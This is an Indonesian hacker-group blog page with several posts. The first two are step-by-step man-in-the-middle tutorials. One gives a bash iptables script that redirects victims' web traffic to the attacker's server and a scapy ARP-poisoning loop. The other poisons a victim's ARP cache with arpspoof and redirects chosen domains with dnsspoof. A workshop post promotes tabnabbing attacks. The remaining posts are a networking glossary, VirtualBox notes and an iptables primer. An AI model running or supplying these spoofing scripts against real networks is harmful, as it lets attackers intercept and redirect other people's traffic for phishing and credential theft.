Pages

Showing posts with label informasi. Show all posts
Showing posts with label informasi. Show all posts

Wednesday, March 23, 2011

./DNS spoofing with scapy

bissmillah...
=============================================
Malang Cyber Crew | indonesian cyber security
=============================================
title    : DNS spoofing with scapy
auth0r   : yur4kh4
blog     : http://www.devirakhjib.uni.cc/
mail     : yur4kh4[at]yahoo[dot[com]
date     : 23-03-2011
Language : Indonesian



[*]pembuka
    tulisan ini di buat semata-mata untuk pelajaran saja, tidak ada maksud untuk merusak & meningkatkan traffic cyber crime di indonesia.
    penulis sangat berharap bahwa masyarakat indonesia bisa lebih meningkatkan security di di bidang IT (khususnya bagi para pengelola)internet cafe
    & satu hal yang terpenting penulis sangat berharap masyarakat indonesia bisa beralih ke sistem operasi yang open source..hee...
   
[*] persiapan
    " pastikan sistem operasi anda linux
    " pastikan python scapy terinstall pada sistem operasi anda
   
    jika belum terinstall python scapy, anda bisa meng install nya lewat synaptic (dalam hal ini saya menggunakan ubuntu)
    jika sudah terinstall lanjut ke tahap selanjutnya.,

[*] konfigurasi

    yang pertama lakukan IP forwading
    echo 1 > /proc/sys/net/ipv4/ip_forward
   
    kemudian non aktivkan ICMP redirect
    echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects

    next IP tables setting
    Apa saja yang bisa dilakukan dengan iptables?
    Dengan kemampuan tools iptables ini, kita bisa membuat aturan (rule), untuk arus lalulintas data.
    silahkan googleing untuk penjelasan lebih mendalam.

iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat

iptables --append FORWARD --in-interface wlan0/eth0 --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0/eth0 --jump MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination 10.42.43.23
iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination 10.42.43.23

ini bash scriptnya..biar ga repot-repot mengetik di termilal..
   
--------------------------------------cut here--------------------------------------------------------
#########################################################
#              yur4kh4                #
#         Malang cyber crew            #
#            kill-9 crew                #
#        indonesiancoder team            #
#########################################################
#!/bin/sh
INTERFACE="wlan0" #cek interface dg mengetikan ifconfig di terminal
SERVERWEB='10.42.43.23' #ip ente

echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects

#clear rule..
iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat

iptables --append FORWARD --in-interface $INTERFACE --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump MASQUERADE

#rendirect traffic.. on my server/proxy
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination $SERVERWEB
iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination $SERVERWEB
--------------------------------------cut here--------------------------------------------------------
save dengan nama: terserah.sh

selanjutnya
save script python-scapy ini dengan nama : ihir.py
--------------------------------------cut here--------------------------------------------------------
from scapy.all import *;
from time import sleep;
conf.iface='wlan0';#network card

target="10.42.43.1";#target /victim

router="10.42.43.1";#routernya

packet = ARP(); #bikin packet :P

packet.psrc = router # Gateway

packet.pdst = target # victim v.v

try:
    while 1:
        send(packet, verbose=0);
        sleep(50);
except:
    pass
--------------------------------------cut here--------------------------------------------------------

nach yg perlu anda lakukan adalah menyesuaikan

INTERFACE="wlan0" #cek interface dg mengetikan ifconfig di terminal
SERVERWEB='10.42.43.23' #ip ente

network card yang terkoneksi dengan internet serta ip local anda
&
target="10.42.43.19";#target /victim

router="10.42.43.1";#routernya

kalau ingin semua permintaan packet client berpindah ke web server anda
target="10.42.43.19/24";#target /victim

dengan begitu semua IP local client akan di alihkan ke IP local anda...:D

[*] eksekusi

root@dEviRakhjib:/home/yur4kh4# ./terserah.sh
root@dEviRakhjib:/home/yur4kh4# python ihir.py

yupzz.,..tunggu beberapa saat
semua permintaan packet akan di kirimkan / di alihkan ke IP anda...:D

greettzz.....:D

[*] penutup
    dengan di jalankannya ihir.py maka berakhir pula tulisan yang sangat sederhana ini..
    semoga sajha mudah untuk di mengerti..namun jika masih di anggap susah untuk di mengerti
    silahkan hubungi saya..^_^
    YM : yur4kh4
        ..Jangan berkata TIDAK, karena semua itu BELUM ..
+++++++++++++++++++thankz t0++++++++++++++++++++++++
[&] allah, muhammad, & seluruh pengikutnya...
[!] Malang Cyber Crew - kill-9 - Indonesian coder
[%] Arianom, Tukulesto , n4ck0 , marahmerah , kamtiez , vYc0d , xr0b0t
    contrex , mboys , Pathloader , t3ll0 , Thunder x c0de, jundab
    ibl13z , geni212 , dhomas , kalong666 ,ichal ,jos_ali_joe, mugna
        &&**akulukasaatkaupergi**&&
+++++++++++++++++++Luv der4+++++++++++++++++++++++++
mirror : http://packetstormsecurity.org/files/view/99642/dnsspoof-scapy.txt

./merubah halaman login facebook (chrome extension)




langsung install sajha gan 

https://chrome.google.com/extensions/detail/bdlfdaajmclngiomogmleihllaejcnni

untuk merubah background
paste ==>>> chrome://extensions/   | di address bar chrome ente
cari "Facebook Refresh" extension & klik "Options" link.
paste link gambar yang ente inginkan.,.:D
beres mas br0.,.liad halaman index facebook anda..;)

Wednesday, March 16, 2011

Temu Teman Malang Cyber crew

bismillah...
alhamdullilah..
masih di beri nafas sampai hari ini..hee...
okey.,langsung sajha, kali ini kami dari malang cyber insya allah akan melaksanakan
workshop / lebih tepatnya bagaimana kalau kita sebut sajha dengan temu teman :)
acara yang akan dilaksanakan pada hari minggu tanggal 20 maret ini murni hasil kerja
dari anggota kami sendiri..:)
dengan dana yang seadanya & hasil iuran dari anggota..kami bisa menyusun acara temu teman
yang baru pertama kali kami laksanakan ini..harapannya semoga saja dengan adanya kegitan ini
bisa membangkitkan serta meningkatkan kreativitas & semangat untuk belajar bersama di bidang IT
tidak ada batasan untuk peserta yang ingin mengikuti kegitan ini.
artinya..siapa saja boleh ikut...tanpa di pungut biaya..pendaftaran..:)
adapun beberapa materi yang akan kami bahas dalam acara ini sebagai berikut :
1. root & jump server
mungkin bagi sebagian orang kata root & jump sangat asing di telinga
tapi bagi sebagian orang lagi..root & jump adalah hal biasa.apalagi bagi pengguna linux
istilah root sangat tidak asing lagi di telinga mereka..hee...akan kita bahas lebih mendalam nantinya

2. multi tabnabbing attack (metasploit)
hhhhmmm.,.istilah ini memang mungkin masih sangat membingungkan apa maksudnya...:D , dengan memanfaatkan
kelemahan DNS (domain name server),.kita bisa melakukan tekhnik serangan ini..di bantu dengan sebuah tools
yang sangat mudah untuk di gunakan..:). akan kita bahas lebih mendalam juga nantinya . :p

3. sharing seputar IT
diskusi-diskusi biasa../ silaturahmi sambil membicarakan perkembangan & kelemahan IT yang ada di
indonesia khususnya yang ada di kota malang..siapa saja boleh bicara tentunya..
menurut pandangannya masing-masing..harapannya dari hasil diskusi ini ada follow up nantinya untuk
terus meningkatkan perkembangan IT indonesia..AMIN.

4. why linux is better>??
jelas kita akan membahas secara tuntas mengapa operating system yang satu ini
kita pandang lebih unggul dari OS-OS yang lainnya...:). bahasan ini yang terpenting menurut kami.

nach...selanjutnya bisa kita sesuaikan dengan kebutuhan saat acara nanti..
semoga apa yang kami lakukan ini mendapat respon yang baik dari teman-teman semua..AMIN...
semoga apa yang kami lakukan ini menjadi berkah nantinya..AMIN..
dan tentunya semoga bermanfaat..AMIN..

NB : untuk teman-teman yang di luar kota malang tidak dilarang untuk hadir & mengikuti acara ini.
tapi karena keterbatasan biaya & sebagainya..
kami dari pihak malang cyber tidak bisa memberikan biaya transportasi untuk temand-temand :(
cP :
YM : yur4kh4
        bgs_ayie2000
        nakula_h3r3

jangan berkata TIDAK, karena semua itu BELUM.


Sunday, March 06, 2011

simple DNS spoof (no ettercap) :p

Dasar Teori

Sebelum dipergunakannya DNS, jaringan komputer menggunakan HOSTS files yang berisi informasi dari nama komputer dan IP address-nya.
Di Internet, file ini dikelola secara terpusat dan di setiap lokasi harus di copy versi terbaru dari HOSTS files,
dari sini bisa dibayangkan betapa repotnya jika ada penambahan 1 komputer di jaringan,
maka kita harus copy versi terbaru file ini ke setiap lokasi. Dengan makin meluasnya jaringan internet,
hal ini makin merepotkan, akhirnya dibuatkan sebuah solusi dimana DNS di desain menggantikan fungsi HOSTS files,
dengan kelebihan unlimited database size, dan performace yang baik.
DNS adalah sebuah aplikasi services di Internet yang menerjemahkan sebuah domain name ke IP address.
Sebagai contoh, www untuk penggunaan di Internet, lalu diketikan nama domain, misalnya: yahoo.com
maka akan di petakan ke sebuah IP mis 202.68.0.134. Jadi DNS dapat di analogikan pada pemakaian buku telepon,
dimana orang yang kita kenal berdasarkan nama untuk menghubunginya kita harus memutar nomor telepon di pesawat telepon.
Sama persis, host computer mengirimkan queries berupa nama komputer dan domain name server ke DNS, lalu oleh DNS dipetakan ke IP address.

sekarang mari kita coba mengulang kembali sejarah yang telah lalu..:)
pertama yang perlu anda siap kan adalah alat bantu..:p

# arpspoof
# dnsspoof

selanjutnya buat file host.txt ( seperti jaman dahulu kala sajha)

isi file host.txt :

192.168.1.100 www.ihir.com
192.168.1.100 *.ihir.com
192.168.1.100 www.ihir.*


192.168.1.100 : IP adress anda
www. ihir.com : website yang akan anda spoof

selanjutnya berubah menjadi sniffer...:p (man in the middle)

$ arpspoof -i eth0 -t 192.168.1.102 192.168.1.1
$ arpspoof -i eth0 -t 192.168.1.1 192.168.1.102

dimana IP
192.168.1.102 = victim
192.168.1.1 = router

jangan lupa menjalankan webserver kesayangan anda.,.:D
next tinggal spoofing sajha...:)

dnsspoof -i eth0 -f host.txt


kalo tidak ada kesalahan maka permintaan dari victim ke ihir.com
akan segera di alihkan ke webserver lokal anda...:)

terserah dach.,.mau di pasang apa di localhostnya...;)

sekian dulu y...semoga tulisan yang sederhana ini bisa bermanfaat utk sahabat-sahabat..AMIN..


regards : yur4kh4

tested on : dEviRakhjib OS,,heee....:lolz:

Saturday, February 26, 2011

Mengenal Jaringan

Jaringan : jaringan (network) adalah kumpulan dua atau lebih sistem komputer yang terhubung. Terdapat banyak jenis jaringan komputer:
a. Local-Area Network (LAN): komputer yang terhubung berada pada tempat yang berdekatan secara gografis (misalkan satu gedung).
b. Wide-Area Network (WAN): komputer yang terhubung berada pada tempat yang berjauhan dan dihubungkan dengan line telepon atau gelombang radio. selain itu, jaringan komputer dapat juga dikelompokan berdasar kriteria di bawah ini:
Topologi : pengaturan keterhubungan antar sistem komputer. Terdapat bermacam-macam topologi seperti bus, star, dan ring.
Protokol : protokol mendefinisikan sekelompok aturan dan sinyal yang digunakan oleh komputer pada jaringan untuk berkomunikasi. Protokol LAN yang paling populer adalah Ethernet. Protokol LAN lain yang banyak digunakan adalah IBM token-ring network.c. arsitektur: jaringan dapat diklasifikasikan ke dalam arsitektur peer-to-peer atau client/server.

NIC : NIC (network interface card) adalah expansion board yang digunakan supaya komputer dapat dihubungkan dengan jaringan. Sebagian besar NIC dirancang untuk jaringan, protokol, dan media tertentu. NIC biasa disebut dengan LAN card (Local Area Network Card).
Backbone : Backbone adalah saluran atau koneksi berkecepatan tinggi yang menjadi lintasan utama dalam sebuah jaringan. Bandwidth : Bandwidth menunjukan kapasitas dalam membawa informasi. Istilah ini dapat digunakan dalam banyak hal: Telepon, jaringan kabel, bus, sinyal frekuensi radio, dan monitor. Paling tepat, bandwidth diukur dengan putaran perdetik (cycles per second), atau hertz (Hz), yaitu perbedaan antara frekuensi terendah dan tertinggi yang dapat ditransmisikan. Tetapi juga sering digunakan ukuran bit per second (bps).
Bridge : Bridge adalah peranti yang meneruskan lalu lintas antara segmen jaringan berdasar informasi pada lapisan data link. Segmen ini mempunyai alamat lapisan jaringan yang sama. Setiap jaringan seharusnya hanya mempunyai sebuah bridge utama.
DNS : DNS (domain name sistem) adalah sistem yang menerjemahkan domain Internet, seperti www.microsoft.com menjadi alamat Internet, yaitu serangkaian nomor yang terlihat seperti 101.232.12.5. Istilah DNS berhubungan dengan konvensi untuk penamaan host pada Internet dan cara penangan nama-nama tersebut.
Ethernet : Ethernet adalah protokol LAN yang dikembangkan oleh Xerox Corporation yang bekerjasama dengan DEC dan Intel pada tahun 1976. Ethernet menggunakan topologi bus atau star dan medukung transfer data sampai dengan 10 Mbps. Versi Ethernet yang lebih baru yang disebut 100Base-T (atau Fast Ethernet), mendukung transfer data sampai dengan 100 Mbps, dan versi terbarunya, Gigabit Ethernet, mendukung tranfer data sampai dengan 1 Gigabit per detik atau 1000 Mbps.
Fast Ethernet : Fast Ethernet seperti Ethernet biasa, namun dengan kecepatan transfer data yang lebih cepat, sampai dengan 100 mbps. Ethernet ini juga disebut 100BaseT.
Gateway : Istilah gateway merujuk kepada hardware atau software yang menjembatani dua aplikasi atau jaringan yang tidak kompatibel, sehingga data dapat ditransfer antar komputer yang berbeda-beda. Salah satu contoh penggunaan gateway adalah pada email, sehingga pertukaran email dapat dilakukan pada sistem yang berbeda.
GPS : GPS (Global Positioning System ) adalah sistem navigasi menggunakan 24 satelit MEO (medium earth orbit atau middle earth orbit) yang mengelilingi bumi dan penerima-penerima di bumi. Satelit mengorbit pada ketinggian sekitar 12.000 mil di atas bumi dan mampu mengelilingi bumi dua kali dalam 24 jam. Satelit GPS secara kontinu mengirimkan sinyal radio digital yang mengandung data lokasi satelit dan waktu pada penerima yang berhubungan. Satelit GPS dilengkapi dengan jam atom dengan ketepatan satu per satu juta detik. Berdasar informasi ini, stasiun penerima mengetahui berapa lama waktu yang digunakan untuk mengirim sinyal sampai ke penerima di bumi. Semakin lama waktu yang digunakan untuk sampai ke penerima, semakin jauh posisi satelit dari stasiun penerima. dengan mengetahui posisi satelit, penerima mengetahui bahwa satelit terletak pada posisi tertentu pada permukaan bola imaginer yang berpusat pada satelit. Dengan menggunakan tiga satelit, GPS dapat menghitung lintang dan bujur penerima berdasar perpotongan ketiga bola imaginer. Dengan menggunakan empat satelit, dapat juga ditentukan ketinggian. GPS dikembangkan dan dioperasikan oleh Departemen Pertahanan Amerika. GPS, asalnya dikenal dengan NAVSTAR (Navigation System with Timing and Ranging). Sebelum untuk keperluan yang lebih luas, GPS digunakan untuk menyediakan kemampuan navigasi sepanjang waktu dan dalam segala cuaca untuk militer darat, laut, dan angkatan udara. Disamping untuk navigasi dan penentuan posisi geografik, GPS dapat juga digunakan di antaranya untuk pemetaan, kehutanan, eksplorasi mineral, manajemen habitat liar, dan pengawasan perpindahan penduduk.
Host : Host adalah sistem komputer yang diakses oleh pengguna yang bekerja pada lokasi yang jauh. Biasanya, istilah ini digunakan jika ada dua sistem komputer yang terhubung dengan modem dan saluran telepon. Sistem mengandung data yang disebut host, sedang sitem yang digunakan untuk mengases dari jarak jauh disebut remote terminal. Istilah host juga digunakan untuk menyebut komputer yang terhubung dengan jaringan TCP/IP, termasuk Internet. Setiap host mempunyai alamat IP yang unik. Selain itu, istilah host juga merujuk pada penyediaan infrastruktur layanan komputer. Sebagai contoh, banyak perusahaan yang menjadi host Web server, yang berarti bahwa perusahaan tersebut menyediakan hardware, software, dan saluran komunikasi yang dibutuhkan oleh server, tetapi isi server (data) dikendalikan oleh pihak lain. ISP (Internet Service Provider) : ISP (Internet service provider) adalah penyedia layanan Internet. Sebagian besar ISP mempunyai jaringan server (mail, berita, Web), router, modem yang dihubungkan dengan koneksi “backbone” Internet yang permanen dan berkecepatan tinggi. Pelanggan ISP dapat mendapatkan koneksi Internet dengan modem dan telepon. Untuk mengakses Internet pelanggan ISP harus melakukan dial ke jaringan dengan menekan nomor telepon tertentu milik ISP.
Internet : Internet adalah jaringan global yang menghubungkan jutaan komputer. Sejak 1999 Internet telah memiliki 200 juta pemakai di seluruh dunia, dan jumlah ini meningkat cepat. Lebih dari 100 negara terhubung dengan Internet untuk menukar data, berita, dan informasi lainnya. Setiap komputer yang terhubung dengan Internet disebut host.
ISDN : ISDN (Integrated Services Digital Network) adalah standard komunikasi internasional untuk pengiriman suara, video dan data melalui line telepon digital atau telepon kawat biasa. ISDN mempunyai kecepatan transfer data 64 Kbps. Sebagian besar saluran ISDN ditawarkan oleh perusahaan telepon yang memungkinkan dua saluran, yang disebut kanal B (B channel). Satu line dapat digunakan untuk suara dan yang lain untuk data lain dan keduanya mempunyai kecepatan transfer 128 Kbps. Versi awal ISDN menggunakan transmisi baseband. Versi lain ISDN, yaitu B-ISDN, menggunakan transmisi broadband dan dapat mendukung transmisi data dengan kecepatan 1,5 Mbps.
Protocol (protokol) : Bahasa atau prosedur hubungan yang digunakan oleh satu sistem komputer dengan sistem lainnya sehingga antara keduanya dapat saling berhububngan. Untuk dapat berkomunikasi. Kedua system harus menggunakan protokol yang sama. PPP (Point To Point Protocol) : Protokol TCP/IP yang memungkinkan hubungan antara host dengan jaringan dan antara router dengan router atau dapat pula digunakan untuk hubungan serial antara 2 system.
Repeater : Suatu perangkat yang dipasang di titik-titik tertentu dalam jaringan untuk memperbarui sinyal-sinyal yang di transmisikan agar mencapai kembali kekuatan dan bentuknya yang semula, guna memperpanjang jarak yang dapat di tempuh. Ini di perlukan karena sinyal-sinyal mengalami perlemahan dan perubahan bentuk selama transmisi.
Router : Suatu perangkat yang berfungsi menghubungkan suatu LAN ke suatu internetworking/WAN dan mengelola penyaluran lalu-lintas data di dalamnya. Routing : Proses dari penentuan sebuah path yang di pakai untuk mengirim data ke tujuan tertentu.
RJ-45 : RJ-45 (Registered Jack-45) adalah konektor delapan kabel yang biasanya digunakan untuk menghubungkan komputer ke sebuah local-area network (LAN), khususnya Ethernets. Konektor RJ-45 mirip dengan konektor RJ-11 yang digunakan dalam koneksi telepon, tetapi lebih besar.
Server : Suatu unit yang berfungsi untuk menyimpan informasi dan untuk mengelola suatu jaringan komputer.komputer server akan melayani seluruh client atau worstation yang terhubung ke jaringannya.
TCP/IP : TCP/IP Transmission Control Protokol adalah dua buah protokol yang dikembangkan oleh militer AS yang memungkinkan komputer pada jaringan dapat saling berhubungan. IP digunakan untuk memindahkan paket data antarsimpul. TCP dugunakan untuk memverifikasi pengiriman dari client ke server. TCP/IP adalah dasar internet dan dapat ditemukan pada semua system operasi modern, seperti Unix dan Windows.
Topologi : Dalam jaringan komputer topologi adalah bentuk pengaturan keterhubungan antar sistem komputer. terdapat bermacam-macam topologi seperti bus, star, ring.
UTP : UTP (Unshielded Twisted Pair) adalah jenis kabel yang terdiri dari dua kawat tak terbungkus yang berpilin. Kabel UTP banyak digunakan pada local-area networks (LANs) dan sambungan telepon karena harganya lebih murah. Kabel UTP tidak sebaik kabel koaksial dan serat optik dalam hal penyediaan banwidth dan ketahanan terhadap interferensi.
VLAN : VLAN (virtual local-area network) adalah jaringan komputer yang seakan terhubung menggunakan kabel yang sama meskipun mungkin secara fisik berada pada bagian LAN yang lain. VLAN dikonfigurasi melalui software dan tidak hardware, yang membuatnya sangat fleksible.Salah satu keunggulan VLAN adalah jika sebuah komputer secara fisik dipindah ke lokasi lain, komputer tersebut tetap pada VLAN yang sama tanpa melakukan konfigurasi ulang hardware.
VPN : VPN (virtual private network) adalah koneksi internet pribadi yang aman dan terenkripsi untuk menjamin bahwa hanya pengguna yang berhak yang dapat mengaksesnya dan trasfer data yang dilakukan tidak dapat diganggu.
VSAT : VSAT (Very Small Aperture Terminal) stasiun bumi yang digunakan pada satelit komunikasi sinyal data, suara, dan video, kecuali pemancaran televisi. VSAT terdiri dari dua bagian: sebuah transceiver yang diletakkan ditempat terbuka sehingga dapat secara langsung menerima sinyal dari satelit dan sebuah piranti yang diletakkan dalam ruangan untuk menghubungkan transceiver dan piranti komunikasi pengguna akhir(end user), seperti PC.Transceiver menerima dan mengirim sinyal ke transponder satelit diluar angkasa. Satelit mengirimkan dan menerima sinyal dari komputer stasiun bumi yang berfungsi sebagai hub sistem. Setiap pengguna yang saling terhubung dengan stasiunhub melewati satelit, membentuk topologi bintang. hub mengendalikan semua operasi pada jaringan. Semua transmisi untuk komunikasi antar pengguna harus melewati stasiunhub yang meneruskannya ke satelit dan kepengguna VSAT yang lain. VSAT dapat mengirimkan data sampai dengan kecepatan 56 Kbps.
WAN : WAN wide area network adalah komputer yang terhubung berada pada tempat yang berjauhan dan hubungan dengan line telepon atau gelombang radio. Lihat juga LAN dan jaringan.
Wi-Fi : Wi-Fi Wireless Fidelity adalah nama dagang resmi untuk IEEE 802.11b yang dibuat oleh Wireless Ethernet Compatibility Aliance (WECA). Istilah Wi-Fi menggantikan 802.11b seperti halnya istilah Ethernet menggantikan IEEE 802.3. Produk yang disertifikasi oleh WECA sebagai Wi-Fi dapat beroperasi bersama meskipun dibuat oleh perusahaan yang berbeda.
Workstation : Pada jaringan komputer, workstation adalah komputer yang terhubung dengan sebuah local-area network (LAN).Istilah workstation juga digunakan untuk menyebut komputer yang digunakan untuk aplikasi teknik (CAD/CAM), desktop publishing, pengembangan software, dan aplikasi lainnya yang membutuhkan tingkat komputasi dan kemampuan grafis yang cukup tinggi.Workstation biasanya terdiri dari layar grafik yang besar dengan revolusi tinggi, RAM minimal 64 MB, dukungan jaringan built-in, dan graphical user interface.Sebagian besar workstation juga mempunyai piranti penyimpanan seperti disk drive, tetapi jenis workstation khusus, yang disebut diskless workstation, tidak mempunyai disk drive. Sistem operasi yang banyak digunakan untuk workstation adalah UNIX dan windows NT. Seperti halnya PC, sebagian besar workstation adalah komputer single user, Meski demikian, workstation pada dasarnya dihubungkan dengan local area network, meskipun dapat juga sebgian sistem yang berdiri sendiri stand alone.
100BaseT : 100BaseT adalah nama lain fast Ethernet yang mempunyai kecepatan transmisi sampai dengan 100 mbps. Jenis 100BaseT ini lebih mahal daripada 10BaseT dan lebih jarang digunakan pada local area network (LAN).
10Base2 : 10Base2 adalah satu jenis standar Ethernet ( IEEE802.3) untuk lokal area network ( LAN ). Standard 10 Base-2 ( yang juga disebut Thinnet )menggunakan kabel koasial 50 ohm ( RG-58A/U ) dengan panjang maksimal 185 meter.kabel ini lebih kecil dan lebih flesibel daripada yang digunakan untuk standard 10 Base 5. Sistem 10 Base-2 beroperasi pada 10 Mbps dan menggunakan metode tranmisi baseband.
10 Base5 : 10 Base-5 adalqh standard awal untuk Ethernet yang menggunakan kabel koasial. nama 10 Base5 didasarkan pada fakta bahwa kecepatan transfer data maksimum adalah 10 Mbps. menggunakan transmisi Baseband, dan panjang kabel maksimal adalah 500 meter. 10 Base5 juga disebut Thick Wire atau thick Net.
10BaseT : 10BaseT adalah jenis Ethernet yang paling umum. Nama tersebut menunjukan bahwa kecepatan transmisi maksimum adalah 10Mbps. 10BaseT menggunakan kabel tembaga dan merupakan card standard untuk menghubungkan komputer pada lokal area network (LAN).

source : http://www.sejutablog.com/

Saturday, February 19, 2011

VirtualBox 4.0.4 (released 2011-02-17)

This is a maintenance release. The following items were fixed and/or added:
  • VMM: fixed recompiler crashes under certain conditions (bugs #8255, #8319 and further)
  • VMM: fixed running 64-bit guests on 32-bit host with nested paging enabled on AMD CPUs (4.0 regression; bug #7938)
  • VMM: fixed timing issues / hangs for certain guests using the programmable interval timer (bugs #8033 and #8062)
  • VMM: large page and monitoring fixes for live snapshots (bugs #7910, #8059, #8125)
  • GUI: fixed error message when trying to exceed the maximum number of host network interfaces
  • GUI: fixed saving of changes to the metadata of an existing snapshot (bug #8145)
  • GUI: fixed rare crash on X11 hosts (bug #8131)
  • GUI: when selecting a shared folder, start the file dialog in the users home directory (bug #8017)
  • ExtPack: enforce the correct permissions which might be restricted by umask when creating directories (non-Windows hosts only; bug #7878)
  • VBoxSDL: fixed crash when starting by specifying the VM UUID (4.0 regression; bug #8342)
  • VBoxManage: allow savestate even if the VM is already paused
  • VBoxManage: fixed modifyvm --synthcpu (bug #6577)
  • VBoxManage: fixed hang when doing guestcontrol execute –wait-for exit and displaying process status on exit (bug #8235)
  • VBoxManage: decreased CPU load during guestcontrol execute –wait-for exit/stdout while waiting for the guest process to terminate (bug #7872)
  • VBoxManage: fixed list hostdvds/hostfloppies
  • VBoxManage: fixed storageattach for host DVD drives and host floppy drives
  • Metrics: introduced RAM/VMM base metric.
  • Main: improved sanity check when taking a VM screen shot (bug #7966)
  • Main: fixed a crash under rare circumstances if a VM failed to start
  • Main: fixed attaching of immutable disk images (bug #8105)
  • Main: fixed a crash at VM shutdown (bug #6443)
  • Main: fixed incorrect handling of cross-referenced medium attachments (bug #8129)
  • Settings: fixed truncating of big integer values (4.0 regression)
  • Settings: properly store the ICH9 chipset type (bug #8123)
  • Host-Only & Bridged Networking: fixed VBox DHCP server startup issue for Windows hosts (4.0 regression; bug #7905)
  • Host-Only Networking: re-create vboxnetX interfaces after vboxnetadp.ko module reload on Linux and Darwin (bugs #5934, #6341)
  • NAT: fixed an mbuf leak under rare circumstances (bug #7459)
  • ACPI: don’t allow the guest to enter S4 by default and don’t announce S1 and S4 in the ACPI tables if disabled (bug #8008)
  • Graphics card: made re-enabling disabled screens work correctly to prevent problems when X11 guests enter screen saving mode (bug #8122)
  • Storage: fixed write errors with snapshots if the host cache is disabled (4.0 regression; bug #8221)
  • ATA/SATA: fixed reset handling after ACPI suspend/resume
  • BusLogic: fixed hang with SMP VMs
  • Serial: another attempt to prevent lost characters during transmission (bug #1548)
  • Linux hosts/guests: Linux 2.6.38-rc1 compile fixes
  • Mac OS X hosts: fixed VBoxSVC crash when listing host interfaces without default gateway (64-bit hosts only; bug #7955)
  • Solaris/Darwin hosts: fixed VM CPU execution cap
  • X.Org guests: fixed a crash on X server restart (bug #8231)
  • X.Org guests: support X.Org Server 1.10 pre-release and Ubuntu 11.04 Alpha.
  • X.Org guests: Add EDID emulation in the graphics driver to prevent GNOME settings daemon changing the mode on login.
  • X.Org guests: never send graphics modes to the host that older VirtualBox versions can’t handle.
  • Linux Additions: fixed a memory leak in the shared folders code if a host link is not readable (bug #8185)
  • Windows Additions: fixed handling of Security Attention Sequence (SAS) with VBoxGINA 

maverick download link :

http://download.virtualbox.org/virtualbox/4.0.4/virtualbox-4.0_4.0.4-70112~Ubuntu~maverick_i386.deb


Friday, February 18, 2011

How to Install Virtual Box In Backtrack

hai..ketemu lagi dech kita.,.ihirrr…..
kali ini saya mau berbagi tentang bagaimana menginstall virtual box di backtrack 4
berdasarkan pengalaman pribadi,,:p. berulang kali saya menginstall virtual box di backtrack selalu saja error,.:(
akhirnya googleing sana-sini…dapat juga satu artikel yang maknyuss.,.:D
jika pesan error yang kalian dapatkan saat menginstall virtual box seperti ini..
VBox status code: -1908 (VERR_VM_DRIVER_NOT_INSTALLED).
dengan kata lain si backtracknya berkata…oowww.,.,.tidak bisa (seperti sule)..ahahaha
atau yang sejenisnya lach.,.pokoknya masalah driver not istalled.
begini solusinya…
pertama bersihkan kernel ubuntu anda..(copas saja)
# dpkg-r virtualbox-ose-modules-2.6.24-16-generic \
virtualbox-ose-modules-generic \ virtualbox-ose-modules-generic \
virtualbox-ose virtualbox-ose
# dpkg-P virtualbox-ose-modules-2.6.24-16-generic \
virtualbox-ose-modules-generic \ virtualbox-ose-modules-generic \
virtualbox-ose virtualbox-ose
selanjutnya…download versi terbaru virtualbox dsini
http://www.virtualbox.org/wiki/Downloads
sekarang tinggal install dech file deb virtualbox yang baru saja anda download tadi…:)
sim.,,salabim.,.ada kadabra….
sudo dpkg -i virtualbox_1.6.0-30421_Ubuntu_hardy_i386.deb
jreennggg,.,…jreenngg,,…
insya allah sudah bisa di gunakan sebagaimana mestinya…
menu >>system>>oracle virtualbox
cukup sekian & terimakasih…:D
kalo ada gangguan or masih mengalami error…silahkan comment..:)
gratiss.,.,.tiss.,.,tiss.,.,.;)
regards : yur4kh4

pengantar ip tables

- Apa itu iptables?
iptables adalah suatu tools dalam sistem operasi linux yang berfungsi sebagai alat untuk melakukan filter (penyaringan) terhadap (trafic) lalulintas data. Secara sederhana digambarkan sebagai pengatur lalulintas data. Dengan iptables inilah kita akan mengatur semua lalulintas dalam komputer kita, baik yang masuk ke komputer, keluar dari komputer, ataupun traffic yang sekedar melewati komputer kita.
- Gimana perintahnya?
iptables [–t tables] [option] [rule] [target]
Contohnya:
iptables –P FORWARD ACCEPT
- Apa saja yang bisa dilakukan dengan iptables?
Dengan kemampuan tools iptables ini, kita bisa melakukan banyak hal dengan iptables. Yang paling penting adalah bahwa dengan iptables ini kita bisa membuat aturan (rule), untuk arus lalulintas data. Aturan aturan itu dapat mencakup banyak hal, seperti besar data yang boleh lewat, jenis paket/datagram yang dapat diterima, mengatur trafic berdasar asal dan tujuan data, forwarding, nat, redirecting, pengelolaan port, dan firewall.
Perlakuan apa saja yang dialami data oleh iptables?
Perlakuan yang dialami oleh data/paket data oleh iptables digambarkan melalui tabel. Macam tabelnya adalah:
1. Filter : tabel default yang ada dalam penggunaan iptables
2. NAT    : tabel ini digunakan untuk fungsi NAT, redirect, redirect port
3. Mangle : tabel ini berfungsi sebagai penghalus proses pengaturan paket
Bagaimana kita bisa peroleh informasi tentang iptables tersebut di dalam sistem operasi linux?
Kita bisa peroleh info tentang iptables, dengan cara mengetikkan:
man iptables
atau
iptables –help
Perintah man adalah untuk mendapatkan manual penggunaaan dari iptables ini. Sedangkan help adalah untuk mendapatkan informasi help dari iptables tersebut.
- OPTION
Option terdiri dari command, dan parameter serta opsi tambahan
COMMAND
Command dan rule yang dipasang pada iptables (firewall) memiliki ketentuan. Pada dasarnya iptables pada komputer dianggap sebagai TABEL IP sesuai dengan namanya. System hanya akan menjalan rule yang ada pada tabel. Sedangkan rule yang sudah ada pada iptables juga dapat di hapus atau di replace dengan rule lain. Berikut beberapa command untuk penambahan, penghapusan dan operasi sejenisnya yang akan diperlakukan terhadap rule.
Daftar  Perintah berikut keterangan
-A atau –append Melakukan penambahan rule
-D atau –delete Melakukan penghapusan rule
-R atau –replace Melakukan replacing rule
-L atau –list Menampilkan ke display, daftar iptables
-F atau –flush Menghapus daftar iptables/pengosongan
-I atau –insert Melakukan penyisipan rule
